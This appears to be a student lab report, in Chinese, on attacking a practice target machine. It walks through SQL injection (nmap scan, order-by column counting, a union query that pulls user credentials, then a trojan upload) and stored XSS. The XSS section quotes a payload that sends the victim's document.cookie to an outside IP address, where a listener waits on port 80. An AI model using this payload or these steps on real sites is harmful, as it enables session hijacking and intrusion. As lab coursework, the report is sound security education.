实验五
Posted p201521410037
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实验五相关的知识,希望对你有一定的参考价值。
一、sql注入靶机攻击
首先搭建虚拟机 用kali扫描下当前网段
使用nmap扫描端口
打开该虚拟机提供的网页可查看网页各信息
在id=2后加一个引号,网页报错 说明该网站存在sql注入漏洞
使用order by语句试出网站后台数据库表的列数 1-4均显示正常网页如下图,当order by 5 时网页报错
使用联合查询 查看网页的显示位
得到显示位就可以显示数据库的名字 photoblog
得到数据库名字 可以顺藤摸瓜查询数据库中的表
可得三列元素
查看user表中的数据得到用户名及密码
尝试登陆
可尝试上传文件
上传木马文件后得到目录列表可以对其进行进一步操作
二、xss靶机攻击
首先与上一个实验相同并打开网页
在靶机上留言<script>document.write(‘<img src="http://192.168.112.132/?‘+document.cookie+‘ "/>‘)</script>并在本机开启80端口监听
以上是关于实验五的主要内容,如果未能解决你的问题,请参考以下文章
2018-2019-2 20175306实验五《网络编程与安全》实验报告